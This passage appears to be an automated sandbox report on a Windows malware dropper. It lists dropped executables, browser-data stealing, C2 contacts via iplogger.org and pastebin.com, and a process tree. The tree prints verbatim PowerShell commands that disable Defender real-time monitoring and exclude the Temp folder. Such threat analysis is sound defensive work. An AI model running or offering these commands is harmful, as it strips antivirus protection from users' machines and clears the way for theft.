N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2128 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe

